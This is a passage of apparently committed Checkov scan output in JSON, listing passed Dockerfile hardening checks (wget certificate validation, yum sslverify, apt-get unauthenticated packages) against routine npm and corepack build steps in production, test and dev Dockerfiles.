"caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_3", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with wget", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_15", + "bc_check_id": null, + "check_name": "Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": 